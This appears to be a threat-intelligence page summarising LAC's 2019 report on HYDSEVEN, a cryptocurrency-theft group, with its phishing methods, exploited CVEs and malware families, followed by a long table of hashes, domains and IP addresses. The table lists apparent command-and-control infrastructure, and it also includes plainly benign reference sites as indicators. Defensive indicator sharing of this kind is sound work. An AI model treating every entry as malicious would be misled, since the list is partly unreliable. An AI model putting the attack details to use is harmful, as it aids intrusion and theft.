Shares 2 IOCs
サイバー救急センターレポート 特別編集号
2019-06-19 • LAC • Cyber Emergency Center Report Special Edition •
https://www.lac.co.jp/lacwatch/pdf/20190619_cecreport_sp.pdf
Attachments
20190619_cecreport_sp.pdf (6 MB)
LAC profiled HYDSEVEN as a cryptocurrency-theft threat group active from 2016 through 2019 against targets in multiple countries, including Japan and Poland. The report describes spear-phishing as a common entry point, with Office VBA macros, Office/Windows exploit chains such as CVE-2015-2545, CVE-2016-7255, and CVE-2017-0199, and fake installer lures used to deliver malware. HYDSEVEN’s payloads included NetWire and Ekoms/Mokes, downloaded through PowerShell or HTA/VBScript stages and supported by overseas C2 infrastructure. The excerpt does not attribute the activity to DPRK actors, so the summary treats it as cryptocurrency-focused CTI context rather than a Lazarus attribution.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| IPv4 | 89.34.111.113 | 2019-03-26 | 2020-01-01 |
| HASH | 786925ad4a4f91a98dd09508471ebddf | 2019-06-19 | 2019-06-19 |
| HASH | 91099aa413722d22aa50f85794ee386e | 2019-06-19 | 2019-06-19 |
| HASH | 58cf773d2eb957d48b931079b9c087dd | 2019-06-19 | 2019-06-19 |
| HASH | a63de560893500588a313e502be3efd2 | 2019-06-19 | 2019-06-19 |
| HASH | 80aa2d0c8c05a78487b85013c43c2143 | 2019-06-19 | 2019-06-19 |
| HASH | 8c1d6403f550a9ddb6640ade3f38a171 | 2019-06-19 | 2019-06-19 |
| HASH | a3e4801aa871f4e165bbd760333237b8 | 2019-06-19 | 2019-06-19 |
| HASH | f84d985b94e31c04b6823af150f0b96f | 2019-06-19 | 2019-06-19 |
| HASH | a86cf58cb8c3ed3ca3c89a2c0443d6d7 | 2019-06-19 | 2019-06-19 |
| HASH | b78c6850cc40b385e839498abc17fc98 | 2019-06-19 | 2019-06-19 |
| HASH | acf159e78dce7c5095640030a5a0d6d2 | 2019-06-19 | 2019-06-19 |
| HASH | 3d9a8ad7ae2bf9d4e4bd6381438d2b0c | 2019-06-19 | 2019-06-19 |
| HASH | 32f30ef97554b4e5993152252e57e86c | 2019-06-19 | 2019-06-19 |
| HASH | b76ae18bb4d86add42b3a9af7b880a39 | 2019-06-19 | 2019-06-19 |
| HASH | a6f3379cdf41f1cdf11ee071e3e40854 | 2019-06-19 | 2019-06-19 |
| HASH | 8ffa073c1d4860ec5ac05b53998b421d | 2019-06-19 | 2019-06-19 |
| HASH | c1aaf1f7652d483ae2d4712d05b5f0ad | 2019-06-19 | 2019-06-19 |
| HASH | 4df998fe61fc43803aed470fe52dc14e | 2019-06-19 | 2019-06-19 |
| HASH | b92c2bdb21b7eb6578bd4cb1ceb9eb64 | 2019-06-19 | 2019-06-19 |
| HASH | 0469be73633d45aea1665ddd31a1c694 | 2019-06-19 | 2019-06-19 |
| HASH | a650ccb18450dff911365aa830d1ecb9 | 2019-06-19 | 2019-06-19 |
| HASH | bae5d7736ff20f96528cde32c8c5e6cb | 2019-06-19 | 2019-06-19 |
| HASH | bf38f2371d30bc6ab6382626a4eba298 | 2019-06-19 | 2019-06-19 |
| HASH | a59252c2d3143dca47fb7e14d1b13d33 | 2019-06-19 | 2019-06-19 |
| HASH | 0943806cea1913227d2595dbcc2b94c0 | 2019-06-19 | 2019-06-19 |
| HASH | 16e55ba5c7870400cfa244ee211414d9 | 2019-06-19 | 2019-06-19 |
| HASH | ad9fa32f08638897fe126db894aa8260 | 2019-06-19 | 2019-06-19 |
| HASH | a20bb703d44d5717feb76fb36f571aea | 2019-06-19 | 2019-06-19 |
| HASH | 0f83e147217c156b7ab66a26cf865827 | 2019-06-19 | 2019-06-19 |
| HASH | bbae132bf631a093af5567e3fb540eee | 2019-06-19 | 2019-06-19 |
| HASH | a8ebaefd17089cce9efb8749926dca6d | 2019-06-19 | 2019-06-19 |
| HASH | a8d7582d9f7e9c2c8631351837817f2d | 2019-06-19 | 2019-06-19 |
| HASH | a9a32cd4275138e6ff9e3b1912b1163b | 2019-06-19 | 2019-06-19 |
| HASH | b7c546c7f72b78568ea99706d0343229 | 2019-06-19 | 2019-06-19 |
| HASH | acd18d845812ac288016c9610d1c9c39 | 2019-06-19 | 2019-06-19 |
| HASH | a26ef7c2b718f2b13240f6f9cf91c693 | 2019-06-19 | 2019-06-19 |
| HASH | ba3a1e3d00e04073e90bfcc744264067 | 2019-06-19 | 2019-06-19 |
| HASH | a4f27cd95be3ae069b285648c568f5ea | 2019-06-19 | 2019-06-19 |
| HASH | a5cbda7bb3864626d6251f3a8cd09cb7 | 2019-06-19 | 2019-06-19 |
| HASH | a4d1098a0c18c147e0b1bfa53cf6dd88 | 2019-06-19 | 2019-06-19 |
| HASH | b5c67058209e85fbc1f048e42ded9a48 | 2019-06-19 | 2019-06-19 |
| HASH | 2abe3cc4bff46455a945d56c27e9fb45 | 2019-06-19 | 2019-06-19 |
| HASH | 838e0e1bfdb8b26fa8bfca3d14b09b9f | 2019-06-19 | 2019-06-19 |
| HASH | 8c0ba5e0351975e8fc0c49fdb6dba4ff | 2019-06-19 | 2019-06-19 |
| HASH | afab14af38d50262b13a95e10cd7bba8 | 2019-06-19 | 2019-06-19 |
| HASH | a549d7ca2deb4aa7f7ce46efa1295e76 | 2019-06-19 | 2019-06-19 |
| HASH | 5f5847160dbfe0d6604dc5b6dd64ffb9 | 2019-06-19 | 2019-06-19 |
| HASH | ab235de113ee97926fb15eeaac555490 | 2019-06-19 | 2019-06-19 |
| HASH | c1e658bcda1b5ddaf7284fe5d219420d | 2019-06-19 | 2019-06-19 |
| HASH | fe84cb5d1832333e5e77cb6efdf5bfb6 | 2019-06-19 | 2019-06-19 |
| HASH | b8b776ebe5cf30c6dc1547ed35a79f42 | 2019-06-19 | 2019-06-19 |
| HASH | a502134c8f4b1d9a055375d79acfa9a9 | 2019-06-19 | 2019-06-19 |
| HASH | ab29919492a0cddabfe2d75c4d42d00d | 2019-06-19 | 2019-06-19 |
| HASH | aadb3437d9c0ede00b9a0672b7bfd0e1 | 2019-06-19 | 2019-06-19 |
| HASH | cb75044f5941530d963df9a626c813ae | 2019-06-19 | 2019-06-19 |
| HASH | ab28a1d4fbe377f4b08c40bbd96e7a51 | 2019-06-19 | 2019-06-19 |
| HASH | 2e4d861bdb438c9b3a3d6658d40d07b2 | 2019-06-19 | 2019-06-19 |
| HASH | a3ce918d207e725f89683cc2c768b454 | 2019-06-19 | 2019-06-19 |
| HASH | bb5f033b8717f42d5804b9c905fe9f50 | 2019-06-19 | 2019-06-19 |
| HASH | aa6cc819f92f26782194369096c02837 | 2019-06-19 | 2019-06-19 |
| HASH | b04e7cba062e23c9bbcc3b8ba38ab4da | 2019-06-19 | 2019-06-19 |
| HASH | abd9e42eb48a10ac1990fdfb03bd09a8 | 2019-06-19 | 2019-06-19 |
| HASH | 006bdb19b6936329bffd4054e270dc6a | 2019-06-19 | 2019-06-19 |
| HASH | a19829fed00d46c91d81f203fe9cb6c5 | 2019-06-19 | 2019-06-19 |
| HASH | a2480c9d205e90432daf4586809f3755 | 2019-06-19 | 2019-06-19 |
| HASH | b4376a7ef36f1357109e6b6362a71152 | 2019-06-19 | 2019-06-19 |
| HASH | a5838df9164d968b40fc5e2140c5ac99 | 2019-06-19 | 2019-06-19 |
| HASH | b1ebf98704fe7549be440692e48b0a72 | 2019-06-19 | 2019-06-19 |
| HASH | ad836caa03a5f1df34d9131922ffa495 | 2019-06-19 | 2019-06-19 |
| HASH | a5462407c447351788ef9ac5bae52c9d | 2019-06-19 | 2019-06-19 |
| HASH | b7a12cc9e44a55814fe9b0cc6aa7fb1e | 2019-06-19 | 2019-06-19 |
| HASH | fcb719e28da41dd7443017eb1f456ff3 | 2019-06-19 | 2019-06-19 |
| HASH | 9a9c3d7a44834f1d08ebdf3c9e5c3e62 | 2019-06-19 | 2019-06-19 |
| HASH | 796e62cc921af203c2dae93159f93f70 | 2019-06-19 | 2019-06-19 |
| HASH | aad72111d8d41e2edc0ab4e96613aa70 | 2019-06-19 | 2019-06-19 |
| HASH | a99a4d2a2cbc10f07d2bbcf0c1c91d0c | 2019-06-19 | 2019-06-19 |
| HASH | de3a8b1e149312dac5b8584a33c3f3c6 | 2019-06-19 | 2019-06-19 |
| HASH | d1f8ba71e08c27e753272eb61d7dd3eb | 2019-06-19 | 2019-06-19 |
| HASH | ba83abf043344d425cf39c612d0fb5c4 | 2019-06-19 | 2019-06-19 |
| HASH | a6f8ae86cf8725e16193e0fab0483c2c | 2019-06-19 | 2019-06-19 |
| HASH | ca584961b8292d3d075b57994883572a | 2019-06-19 | 2019-06-19 |
| HASH | a2d60db7db42adc8c3ab87b3dd244777 | 2019-06-19 | 2019-06-19 |
| HASH | afdc898cf874b74e68280185867250f9 | 2019-06-19 | 2019-06-19 |
| HASH | 796dff8007f3163adfcb9fa7f5fded1c | 2019-06-19 | 2019-06-19 |
| HASH | f08d3083c19320e2202128802b7ff306 | 2019-06-19 | 2019-06-19 |
| HASH | ab373d32f290e6928446f7f94e616c38 | 2019-06-19 | 2019-06-19 |
| HASH | b157c08db89d194eaa73c0723cf42b36 | 2019-06-19 | 2019-06-19 |
| HASH | a24aef033e061d358579250c6fed8e32 | 2019-06-19 | 2019-06-19 |
| URL | https://exatel.pl/paranoicy/ | 2019-06-19 | 2019-06-19 |
| URL | https://nwjs.io | 2019-06-19 | 2019-06-19 |
| URL | https://vms.drweb.co.jp/virus/?… | 2019-06-19 | 2019-06-19 |
| URL | https://vms.drweb.co.jp/virus/?… | 2019-06-19 | 2019-06-19 |
| URL | https://www.dreamincode.net/for… | 2019-06-19 | 2019-06-19 |
| DOMAIN | vms.drweb.co.jp | 2019-06-19 | 2019-06-19 |
| DOMAIN | statalicensesrv.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | kurgen3211a.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | gloria18611.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | kleboneonn12.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | dreamincode.net | 2019-06-19 | 2019-06-19 |
| DOMAIN | stata14lic.org | 2019-06-19 | 2019-06-19 |
| DOMAIN | en.nalog.io | 2019-06-19 | 2019-06-19 |
| DOMAIN | kaplaromenmmxs.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | jikenick12and67.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | exatel.pl | 2019-06-19 | 2019-06-19 |
| DOMAIN | jessiman901.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | anongfs671234d.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | homegwjskjl111.info | 2019-06-19 | 2019-06-19 |
| DOMAIN | g890ios20.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | cameforcameand33212.com | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.192 | 2019-06-19 | 2019-06-19 |
| IPv4 | 45.63.22.17 | 2019-06-19 | 2019-06-19 |
| IPv4 | 149.202.69.6 | 2019-06-19 | 2019-06-19 |
| IPv4 | 158.69.24.141 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.193 | 2019-06-19 | 2019-06-19 |
| IPv4 | 94.23.48.115 | 2019-06-19 | 2019-06-19 |
| IPv4 | 51.255.86.55 | 2019-06-19 | 2019-06-19 |
| IPv4 | 137.59.22.42 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.145 | 2019-06-19 | 2019-06-19 |
| IPv4 | 81.4.122.139 | 2019-06-19 | 2019-06-19 |
| IPv4 | 84.200.2.12 | 2019-06-19 | 2019-06-19 |
| IPv4 | 91.121.120.198 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.106.122.113 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.195 | 2019-06-19 | 2019-06-19 |
| IPv4 | 119.81.131.251 | 2019-06-19 | 2019-06-19 |
| IPv4 | 162.248.227.9 | 2019-06-19 | 2019-06-19 |
| IPv4 | 188.165.218.177 | 2019-06-19 | 2019-06-19 |
| IPv4 | 103.234.220.230 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.82.21.65 | 2019-06-19 | 2019-06-19 |
| IPv4 | 46.165.194.94 | 2019-06-19 | 2019-06-19 |
| IPv4 | 146.185.170.48 | 2019-06-19 | 2019-06-19 |
| IPv4 | 37.235.48.233 | 2019-06-19 | 2019-06-19 |
| IPv4 | 46.165.249.77 | 2019-06-19 | 2019-06-19 |
| IPv4 | 130.255.185.77 | 2019-06-19 | 2019-06-19 |
| HASH | 12def981952667740eb06ee91168e643 | 2019-03-26 | 2019-06-19 |